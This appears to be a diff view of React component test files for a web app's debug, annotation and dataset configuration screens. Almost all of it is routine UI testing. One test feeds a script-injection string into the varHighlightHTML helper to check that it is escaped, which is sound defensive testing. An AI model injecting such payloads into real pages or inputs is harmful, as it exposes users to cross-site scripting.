// Mock the API response
mockAddAnnotation.mockResolvedValueOnce({
id: 'test-annotation-id',
account: { name: 'Test User' },
})
// Act
render(<EditAnnotationModal {...props} />)
// Edit query content
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Updated query')
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', {
question: 'Updated query',
answer: 'Test answer',
message_id: undefined,
})
})
it('should call editAnnotation when updating existing annotation', async () => {
// Arrange
const mockOnEdited = jest.fn()
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
messageId: 'test-message-id',
onEdited: mockOnEdited,
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
// Edit query content
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Modified query')
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockEditAnnotation).toHaveBeenCalledWith(
'test-app-id',
'test-annotation-id',
{
message_id: 'test-message-id',
question: 'Modified query',
answer: 'Test answer',
},
)
})
})
// State Management
describe('State Management', () => {
it('should initialize with closed confirm modal', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Confirm dialog should not be visible initially
expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument()
})
it('should show confirm modal when remove is clicked', async () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
await user.click(screen.getByText('appAnnotation.editModal.removeThisCache'))
// Assert - Confirmation dialog should appear
expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument()
})
it('should call onRemove when removal is confirmed', async () => {
// Arrange
const mockOnRemove = jest.fn()
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
onRemove: mockOnRemove,
}
const user = userEvent.setup()
// Act
render(<EditAnnotationModal {...props} />)
// Click remove
await user.click(screen.getByText('appAnnotation.editModal.removeThisCache'))
// Click confirm
const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' })
await user.click(confirmButton)
// Assert
expect(mockOnRemove).toHaveBeenCalled()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle empty query and answer', () => {
// Arrange
const props = {
...defaultProps,
query: '',
answer: '',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument()
})
it('should handle very long content', () => {
// Arrange
const longQuery = 'Q'.repeat(1000)
const longAnswer = 'A'.repeat(1000)
const props = {
...defaultProps,
query: longQuery,
answer: longAnswer,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText(longQuery)).toBeInTheDocument()
expect(screen.getByText(longAnswer)).toBeInTheDocument()
})
it('should handle special characters in content', () => {
// Arrange
const specialQuery = 'Query with & < > " \' characters'
const specialAnswer = 'Answer with & < > " \' characters'
const props = {
...defaultProps,
query: specialQuery,
answer: specialAnswer,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText(specialQuery)).toBeInTheDocument()
expect(screen.getByText(specialAnswer)).toBeInTheDocument()
})
it('should handle onlyEditResponse prop', () => {
// Arrange
const props = {
...defaultProps,
onlyEditResponse: true,
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Query should be readonly, answer should be editable
const editLinks = screen.queryAllByText(/common\.operation\.edit/i)
expect(editLinks).toHaveLength(1) // Only answer should have edit button
})
})
})

View File

@ -0,0 +1,21 @@
import { render, screen } from '@testing-library/react'
import GroupName from './index'
describe('GroupName', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render name when provided', () => {
// Arrange
const title = 'Inputs'
// Act
render(<GroupName name={title} />)
// Assert
expect(screen.getByText(title)).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,70 @@
import { fireEvent, render, screen } from '@testing-library/react'
import OperationBtn from './index'
jest.mock('@remixicon/react', () => ({
RiAddLine: (props: { className?: string }) => (
<svg data-testid='add-icon' className={props.className} />
),
RiEditLine: (props: { className?: string }) => (
<svg data-testid='edit-icon' className={props.className} />
),
}))
describe('OperationBtn', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering icons and translation labels
describe('Rendering', () => {
it('should render passed custom class when provided', () => {
// Arrange
const customClass = 'custom-class'
// Act
render(<OperationBtn type='add' className={customClass} />)
// Assert
expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass)
})
it('should render add icon when type is add', () => {
// Arrange
const onClick = jest.fn()
// Act
render(<OperationBtn type='add' onClick={onClick} className='custom-class' />)
// Assert
expect(screen.getByTestId('add-icon')).toBeInTheDocument()
expect(screen.getByText('common.operation.add')).toBeInTheDocument()
})
it('should render edit icon when provided', () => {
// Arrange
const actionName = 'Rename'
// Act
render(<OperationBtn type='edit' actionName={actionName} />)
// Assert
expect(screen.getByTestId('edit-icon')).toBeInTheDocument()
expect(screen.queryByTestId('add-icon')).toBeNull()
expect(screen.getByText(actionName)).toBeInTheDocument()
})
})
// Click handling
describe('Interactions', () => {
it('should execute click handler when button is clicked', () => {
// Arrange
const onClick = jest.fn()
render(<OperationBtn type='add' onClick={onClick} />)
// Act
fireEvent.click(screen.getByText('common.operation.add'))
// Assert
expect(onClick).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -0,0 +1,62 @@
import { render, screen } from '@testing-library/react'
import VarHighlight, { varHighlightHTML } from './index'
describe('VarHighlight', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering highlighted variable tags
describe('Rendering', () => {
it('should render braces around the variable name with default styles', () => {
// Arrange
const props = { name: 'userInput' }
// Act
const { container } = render(<VarHighlight {...props} />)
// Assert
expect(screen.getByText('userInput')).toBeInTheDocument()
expect(screen.getAllByText('{{')[0]).toBeInTheDocument()
expect(screen.getAllByText('}}')[0]).toBeInTheDocument()
expect(container.firstChild).toHaveClass('item')
})
it('should apply custom class names when provided', () => {
// Arrange
const props = { name: 'custom', className: 'mt-2' }
// Act
const { container } = render(<VarHighlight {...props} />)
// Assert
expect(container.firstChild).toHaveClass('mt-2')
})
})
// Escaping HTML via helper
describe('varHighlightHTML', () => {
it('should escape dangerous characters before returning HTML string', () => {
// Arrange
const props = { name: '<script>alert(\'xss\')</script>' }
// Act
const html = varHighlightHTML(props)
// Assert
expect(html).toContain('&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;')
expect(html).not.toContain('<script>')
})
it('should include custom class names in the wrapper element', () => {
// Arrange
const props = { name: 'data', className: 'text-primary' }
// Act
const html = varHighlightHTML(props)
// Assert
expect(html).toContain('class="item text-primary')
})
})
})

View File

@ -0,0 +1,22 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import CannotQueryDataset from './cannot-query-dataset'
describe('CannotQueryDataset WarningMask', () => {
test('should render dataset warning copy and action button', () => {
const onConfirm = jest.fn()
render(<CannotQueryDataset onConfirm={onConfirm} />)
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSet')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSetTip')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' })).toBeInTheDocument()
})
test('should invoke onConfirm when OK button clicked', () => {
const onConfirm = jest.fn()
render(<CannotQueryDataset onConfirm={onConfirm} />)
fireEvent.click(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' }))
expect(onConfirm).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,39 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import FormattingChanged from './formatting-changed'
describe('FormattingChanged WarningMask', () => {
test('should display translation text and both actions', () => {
const onConfirm = jest.fn()
const onCancel = jest.fn()
render(
<FormattingChanged
onConfirm={onConfirm}
onCancel={onCancel}
/>,
)
expect(screen.getByText('appDebug.formattingChangedTitle')).toBeInTheDocument()
expect(screen.getByText('appDebug.formattingChangedText')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument()
expect(screen.getByRole('button', { name: /common\.operation\.refresh/ })).toBeInTheDocument()
})
test('should call callbacks when buttons are clicked', () => {
const onConfirm = jest.fn()
const onCancel = jest.fn()
render(
<FormattingChanged
onConfirm={onConfirm}
onCancel={onCancel}
/>,
)
fireEvent.click(screen.getByRole('button', { name: /common\.operation\.refresh/ }))
fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' }))
expect(onConfirm).toHaveBeenCalledTimes(1)
expect(onCancel).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,26 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import HasNotSetAPI from './has-not-set-api'
describe('HasNotSetAPI WarningMask', () => {
test('should show default title when trial not finished', () => {
render(<HasNotSetAPI isTrailFinished={false} onSetting={jest.fn()} />)
expect(screen.getByText('appDebug.notSetAPIKey.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.notSetAPIKey.description')).toBeInTheDocument()
})
test('should show trail finished title when flag is true', () => {
render(<HasNotSetAPI isTrailFinished onSetting={jest.fn()} />)
expect(screen.getByText('appDebug.notSetAPIKey.trailFinished')).toBeInTheDocument()
})
test('should call onSetting when primary button clicked', () => {
const onSetting = jest.fn()
render(<HasNotSetAPI isTrailFinished={false} onSetting={onSetting} />)
fireEvent.click(screen.getByRole('button', { name: 'appDebug.notSetAPIKey.settingBtn' }))
expect(onSetting).toHaveBeenCalledTimes(1)
})
})

View File

@ -0,0 +1,25 @@
import React from 'react'
import { render, screen } from '@testing-library/react'
import WarningMask from './index'
describe('WarningMask', () => {
// Rendering of title, description, and footer content
describe('Rendering', () => {
test('should display provided title, description, and footer node', () => {
const footer = <button type="button">Retry</button>
// Arrange
render(
<WarningMask
title="Access Restricted"
description="Only workspace owners may modify this section."
footer={footer}
/>,
)
// Assert
expect(screen.getByText('Access Restricted')).toBeInTheDocument()
expect(screen.getByText('Only workspace owners may modify this section.')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'Retry' })).toBeInTheDocument()
})
})
})

View File

@ -2,12 +2,6 @@ import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import ConfirmAddVar from './index'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('../../base/var-highlight', () => ({
__esModule: true,
default: ({ name }: { name: string }) => <span data-testid="var-highlight">{name}</span>,

View File

@ -3,12 +3,6 @@ import { fireEvent, render, screen } from '@testing-library/react'
import EditModal from './edit-modal'
import type { ConversationHistoriesRole } from '@/models/debug'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('@/app/components/base/modal', () => ({
__esModule: true,
default: ({ children }: { children: React.ReactNode }) => <div>{children}</div>,

View File

@ -2,12 +2,6 @@ import React from 'react'
import { render, screen } from '@testing-library/react'
import HistoryPanel from './history-panel'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
const mockDocLink = jest.fn(() => 'doc-link')
jest.mock('@/context/i18n', () => ({
useDocLink: () => mockDocLink,

View File

@ -6,12 +6,6 @@ import { MAX_PROMPT_MESSAGE_LENGTH } from '@/config'
import { type PromptItem, PromptRole, type PromptVariable } from '@/models/debug'
import { AppModeEnum, ModelModeType } from '@/types/app'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
type DebugConfiguration = {
isAdvancedMode: boolean
currentAdvancedPrompt: PromptItem | PromptItem[]

View File

@ -5,12 +5,6 @@ jest.mock('react-sortablejs', () => ({
ReactSortable: ({ children }: { children: React.ReactNode }) => <div>{children}</div>,
}))
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('ConfigSelect Component', () => {
const defaultProps = {
options: ['Option 1', 'Option 2'],

View File

@ -0,0 +1,121 @@
import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import ConfigString, { type IConfigStringProps } from './index'
const renderConfigString = (props?: Partial<IConfigStringProps>) => {
const onChange = jest.fn()
const defaultProps: IConfigStringProps = {
value: 5,
maxLength: 10,
modelId: 'model-id',
onChange,
}
render(<ConfigString {...defaultProps} {...props} />)
return { onChange }
}
describe('ConfigString', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render numeric input with bounds', () => {
renderConfigString({ value: 3, maxLength: 8 })
const input = screen.getByRole('spinbutton')
expect(input).toHaveValue(3)
expect(input).toHaveAttribute('min', '1')
expect(input).toHaveAttribute('max', '8')
})
it('should render empty input when value is undefined', () => {
const { onChange } = renderConfigString({ value: undefined })
expect(screen.getByRole('spinbutton')).toHaveValue(null)
expect(onChange).not.toHaveBeenCalled()
})
})
describe('Effect behavior', () => {
it('should clamp initial value to maxLength when it exceeds limit', async () => {
const onChange = jest.fn()
render(
<ConfigString
value={15}
maxLength={10}
modelId="model-id"
onChange={onChange}
/>,
)
await waitFor(() => {
expect(onChange).toHaveBeenCalledWith(10)
})
expect(onChange).toHaveBeenCalledTimes(1)
})
it('should clamp when updated prop value exceeds maxLength', async () => {
const onChange = jest.fn()
const { rerender } = render(
<ConfigString
value={4}
maxLength={6}
modelId="model-id"
onChange={onChange}
/>,
)
rerender(
<ConfigString
value={9}
maxLength={6}
modelId="model-id"
onChange={onChange}
/>,
)
await waitFor(() => {
expect(onChange).toHaveBeenCalledWith(6)
})
expect(onChange).toHaveBeenCalledTimes(1)
})
})
describe('User interactions', () => {
it('should clamp entered value above maxLength', () => {
const { onChange } = renderConfigString({ maxLength: 7 })
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '12' } })
expect(onChange).toHaveBeenCalledWith(7)
})
it('should raise value below minimum to one', () => {
const { onChange } = renderConfigString()
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '0' } })
expect(onChange).toHaveBeenCalledWith(1)
})
it('should forward parsed value when within bounds', () => {
const { onChange } = renderConfigString({ maxLength: 9 })
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '7' } })
expect(onChange).toHaveBeenCalledWith(7)
})
it('should pass through NaN when input is cleared', () => {
const { onChange } = renderConfigString()
fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '' } })
expect(onChange).toHaveBeenCalledTimes(1)
expect(onChange.mock.calls[0][0]).toBeNaN()
})
})
})

View File

@ -0,0 +1,45 @@
import React from 'react'
import { fireEvent, render, screen } from '@testing-library/react'
import SelectTypeItem from './index'
import { InputVarType } from '@/app/components/workflow/types'
describe('SelectTypeItem', () => {
// Rendering pathways based on type and selection state
describe('Rendering', () => {
test('should render ok', () => {
// Arrange
const { container } = render(
<SelectTypeItem
type={InputVarType.textInput}
selected={false}
onClick={jest.fn()}
/>,
)
// Assert
expect(screen.getByText('appDebug.variableConfig.text-input')).toBeInTheDocument()
expect(container.querySelector('svg')).not.toBeNull()
})
})
// User interaction outcomes
describe('Interactions', () => {
test('should trigger onClick when item is pressed', () => {
const handleClick = jest.fn()
// Arrange
render(
<SelectTypeItem
type={InputVarType.paragraph}
selected={false}
onClick={handleClick}
/>,
)
// Act
fireEvent.click(screen.getByText('appDebug.variableConfig.paragraph'))
// Assert
expect(handleClick).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -0,0 +1,42 @@
import { fireEvent, render, screen } from '@testing-library/react'
import ContrlBtnGroup from './index'
describe('ContrlBtnGroup', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering fixed action buttons
describe('Rendering', () => {
it('should render buttons when rendered', () => {
// Arrange
const onSave = jest.fn()
const onReset = jest.fn()
// Act
render(<ContrlBtnGroup onSave={onSave} onReset={onReset} />)
// Assert
expect(screen.getByTestId('apply-btn')).toBeInTheDocument()
expect(screen.getByTestId('reset-btn')).toBeInTheDocument()
})
})
// Handling click interactions
describe('Interactions', () => {
it('should invoke callbacks when buttons are clicked', () => {
// Arrange
const onSave = jest.fn()
const onReset = jest.fn()
render(<ContrlBtnGroup onSave={onSave} onReset={onReset} />)
// Act
fireEvent.click(screen.getByTestId('apply-btn'))
fireEvent.click(screen.getByTestId('reset-btn'))
// Assert
expect(onSave).toHaveBeenCalledTimes(1)
expect(onReset).toHaveBeenCalledTimes(1)
})
})
})

View File

@ -15,8 +15,8 @@ const ContrlBtnGroup: FC<IContrlBtnGroupProps> = ({ onSave, onReset }) => {
return (
<div className="fixed bottom-0 left-[224px] h-[64px] w-[519px]">
<div className={`${s.ctrlBtn} flex h-full items-center gap-2 bg-white pl-4`}>
<Button variant='primary' onClick={onSave}>{t('appDebug.operation.applyConfig')}</Button>
<Button onClick={onReset}>{t('appDebug.operation.resetConfig')}</Button>
<Button variant='primary' onClick={onSave} data-testid="apply-btn">{t('appDebug.operation.applyConfig')}</Button>
<Button onClick={onReset} data-testid="reset-btn">{t('appDebug.operation.resetConfig')}</Button>
</div>
</div>
)

View File

@ -0,0 +1,242 @@
import { fireEvent, render, screen, waitFor, within } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import Item from './index'
import type React from 'react'
import type { DataSet } from '@/models/datasets'
import { ChunkingMode, DataSourceType, DatasetPermission } from '@/models/datasets'
import type { IndexingType } from '@/app/components/datasets/create/step-two'
import type { RetrievalConfig } from '@/types/app'
import { RETRIEVE_METHOD } from '@/types/app'
import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints'
jest.mock('../settings-modal', () => ({
__esModule: true,
default: ({ onSave, onCancel, currentDataset }: any) => (
<div>
<div>Mock settings modal</div>
<button onClick={() => onSave({ ...currentDataset, name: 'Updated dataset' })}>Save changes</button>
<button onClick={onCancel}>Close</button>
</div>
),
}))
jest.mock('@/hooks/use-breakpoints', () => {
const actual = jest.requireActual('@/hooks/use-breakpoints')
return {
__esModule: true,
...actual,
default: jest.fn(() => actual.MediaType.pc),
}
})
const mockedUseBreakpoints = useBreakpoints as jest.MockedFunction<typeof useBreakpoints>
const baseRetrievalConfig: RetrievalConfig = {
search_method: RETRIEVE_METHOD.semantic,
reranking_enable: false,
reranking_model: {
reranking_provider_name: 'provider',
reranking_model_name: 'rerank-model',
},
top_k: 4,
score_threshold_enabled: false,
score_threshold: 0,
}
const defaultIndexingTechnique: IndexingType = 'high_quality' as IndexingType
const createDataset = (overrides: Partial<DataSet> = {}): DataSet => {
const {
retrieval_model,
retrieval_model_dict,
icon_info,
...restOverrides
} = overrides
const resolvedRetrievalModelDict = {
...baseRetrievalConfig,
...retrieval_model_dict,
}
const resolvedRetrievalModel = {
...baseRetrievalConfig,
...(retrieval_model ?? retrieval_model_dict),
}
const defaultIconInfo = {
icon: '📘',
icon_type: 'emoji',
icon_background: '#FFEAD5',
icon_url: '',
}
const resolvedIconInfo = ('icon_info' in overrides)
? icon_info
: defaultIconInfo
return {
id: 'dataset-id',
name: 'Dataset Name',
indexing_status: 'completed',
icon_info: resolvedIconInfo as DataSet['icon_info'],
description: 'A test dataset',
permission: DatasetPermission.onlyMe,
data_source_type: DataSourceType.FILE,
indexing_technique: defaultIndexingTechnique,
author_name: 'author',
created_by: 'creator',
updated_by: 'updater',
updated_at: 0,
app_count: 0,
doc_form: ChunkingMode.text,
document_count: 0,
total_document_count: 0,
total_available_documents: 0,
word_count: 0,
provider: 'dify',
embedding_model: 'text-embedding',
embedding_model_provider: 'openai',
embedding_available: true,
retrieval_model_dict: resolvedRetrievalModelDict,
retrieval_model: resolvedRetrievalModel,
tags: [],
external_knowledge_info: {
external_knowledge_id: 'external-id',
external_knowledge_api_id: 'api-id',
external_knowledge_api_name: 'api-name',
external_knowledge_api_endpoint: 'https://endpoint',
},
external_retrieval_model: {
top_k: 2,
score_threshold: 0.5,
score_threshold_enabled: true,
},
built_in_field_enabled: true,
doc_metadata: [],
keyword_number: 3,
pipeline_id: 'pipeline-id',
is_published: true,
runtime_mode: 'general',
enable_api: true,
is_multimodal: false,
...restOverrides,
}
}
const renderItem = (config: DataSet, props?: Partial<React.ComponentProps<typeof Item>>) => {
const onSave = jest.fn()
const onRemove = jest.fn()
render(
<Item
config={config}
onSave={onSave}
onRemove={onRemove}
{...props}
/>,
)
return { onSave, onRemove }
}
describe('dataset-config/card-item', () => {
beforeEach(() => {
jest.clearAllMocks()
mockedUseBreakpoints.mockReturnValue(MediaType.pc)
})
it('should render dataset details with indexing and external badges', () => {
const dataset = createDataset({
provider: 'external',
retrieval_model_dict: {
...baseRetrievalConfig,
search_method: RETRIEVE_METHOD.semantic,
},
})
renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const actionButtons = within(card).getAllByRole('button', { hidden: true })
expect(screen.getByText(dataset.name)).toBeInTheDocument()
expect(screen.getByText('dataset.indexingTechnique.high_quality · dataset.indexingMethod.semantic_search')).toBeInTheDocument()
expect(screen.getByText('dataset.externalTag')).toBeInTheDocument()
expect(actionButtons).toHaveLength(2)
})
it('should open settings drawer from edit action and close after saving', async () => {
const user = userEvent.setup()
const dataset = createDataset()
const { onSave } = renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const [editButton] = within(card).getAllByRole('button', { hidden: true })
await user.click(editButton)
expect(screen.getByText('Mock settings modal')).toBeInTheDocument()
await waitFor(() => {
expect(screen.getByRole('dialog')).toBeVisible()
})
await user.click(screen.getByText('Save changes'))
await waitFor(() => {
expect(onSave).toHaveBeenCalledWith(expect.objectContaining({ name: 'Updated dataset' }))
})
await waitFor(() => {
expect(screen.getByText('Mock settings modal')).not.toBeVisible()
})
})
it('should call onRemove and toggle destructive state on hover', async () => {
const user = userEvent.setup()
const dataset = createDataset()
const { onRemove } = renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const buttons = within(card).getAllByRole('button', { hidden: true })
const deleteButton = buttons[buttons.length - 1]
expect(deleteButton.className).not.toContain('action-btn-destructive')
fireEvent.mouseEnter(deleteButton)
expect(deleteButton.className).toContain('action-btn-destructive')
expect(card.className).toContain('border-state-destructive-border')
fireEvent.mouseLeave(deleteButton)
expect(deleteButton.className).not.toContain('action-btn-destructive')
await user.click(deleteButton)
expect(onRemove).toHaveBeenCalledWith(dataset.id)
})
it('should use default icon information when icon details are missing', () => {
const dataset = createDataset({ icon_info: undefined })
renderItem(dataset)
const nameElement = screen.getByText(dataset.name)
const iconElement = nameElement.parentElement?.firstElementChild as HTMLElement
expect(iconElement).toHaveStyle({ background: '#FFF4ED' })
expect(iconElement.querySelector('em-emoji')).toHaveAttribute('id', '📙')
})
it('should apply mask overlay on mobile when drawer is open', async () => {
mockedUseBreakpoints.mockReturnValue(MediaType.mobile)
const user = userEvent.setup()
const dataset = createDataset()
renderItem(dataset)
const card = screen.getByText(dataset.name).closest('.group') as HTMLElement
const [editButton] = within(card).getAllByRole('button', { hidden: true })
await user.click(editButton)
expect(screen.getByText('Mock settings modal')).toBeInTheDocument()
const overlay = Array.from(document.querySelectorAll('[class]'))
.find(element => element.className.toString().includes('bg-black/30'))
expect(overlay).toBeInTheDocument()
})
})

View File

@ -0,0 +1,299 @@
import * as React from 'react'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import ContextVar from './index'
import type { Props } from './var-picker'
// Mock external dependencies only
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
type PortalToFollowElemProps = {
children: React.ReactNode
open?: boolean
onOpenChange?: (open: boolean) => void
}
type PortalToFollowElemTriggerProps = React.HTMLAttributes<HTMLElement> & { children?: React.ReactNode; asChild?: boolean }
type PortalToFollowElemContentProps = React.HTMLAttributes<HTMLDivElement> & { children?: React.ReactNode }
jest.mock('@/app/components/base/portal-to-follow-elem', () => {
const PortalContext = React.createContext({ open: false })
const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => {
return (
<PortalContext.Provider value={{ open: !!open }}>
<div data-testid="portal">{children}</div>
</PortalContext.Provider>
)
}
const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => {
const { open } = React.useContext(PortalContext)
if (!open) return null
return (
<div data-testid="portal-content" {...props}>
{children}
</div>
)
}
const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => {
if (asChild && React.isValidElement(children)) {
return React.cloneElement(children, {
...props,
'data-testid': 'portal-trigger',
} as React.HTMLAttributes<HTMLElement>)
}
return (
<div data-testid="portal-trigger" {...props}>
{children}
</div>
)
}
return {
PortalToFollowElem,
PortalToFollowElemContent,
PortalToFollowElemTrigger,
}
})
describe('ContextVar', () => {
const mockOptions: Props['options'] = [
{ name: 'Variable 1', value: 'var1', type: 'string' },
{ name: 'Variable 2', value: 'var2', type: 'number' },
]
const defaultProps: Props = {
value: 'var1',
options: mockOptions,
onChange: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should display query variable selector when options are provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
})
it('should show selected variable with proper formatting when value is provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should display selected variable when value prop is provided', () => {
// Arrange
const props = { ...defaultProps, value: 'var2' }
// Act
render(<ContextVar {...props} />)
// Assert - Should display the selected value
expect(screen.getByText('var2')).toBeInTheDocument()
})
it('should show placeholder text when no value is selected', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert - Should show placeholder instead of variable
expect(screen.queryByText('var1')).not.toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should display custom tip message when notSelectedVarTip is provided', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
notSelectedVarTip: 'Select a variable',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('Select a variable')).toBeInTheDocument()
})
it('should apply custom className to VarPicker when provided', () => {
// Arrange
const props = {
...defaultProps,
className: 'custom-class',
}
// Act
const { container } = render(<ContextVar {...props} />)
// Assert
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should call onChange when user selects a different variable', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<ContextVar {...props} />)
const triggers = screen.getAllByTestId('portal-trigger')
const varPickerTrigger = triggers[triggers.length - 1]
await user.click(varPickerTrigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Select a different option
const options = screen.getAllByText('var2')
expect(options.length).toBeGreaterThan(0)
await user.click(options[0])
// Assert
expect(onChange).toHaveBeenCalledWith('var2')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown when clicking the trigger button', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<ContextVar {...props} />)
const triggers = screen.getAllByTestId('portal-trigger')
const varPickerTrigger = triggers[triggers.length - 1]
// Open dropdown
await user.click(varPickerTrigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(varPickerTrigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle undefined value gracefully', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
expect(screen.queryByText('var1')).not.toBeInTheDocument()
})
it('should handle empty options array', () => {
// Arrange
const props = {
...defaultProps,
options: [],
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle null value without crashing', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle options with different data types', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'String Var', value: 'strVar', type: 'string' },
{ name: 'Number Var', value: '42', type: 'number' },
{ name: 'Boolean Var', value: 'true', type: 'boolean' },
],
value: 'strVar',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('strVar')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
it('should render variable names with special characters safely', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' },
],
value: 'specialVar',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('specialVar')).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,392 @@
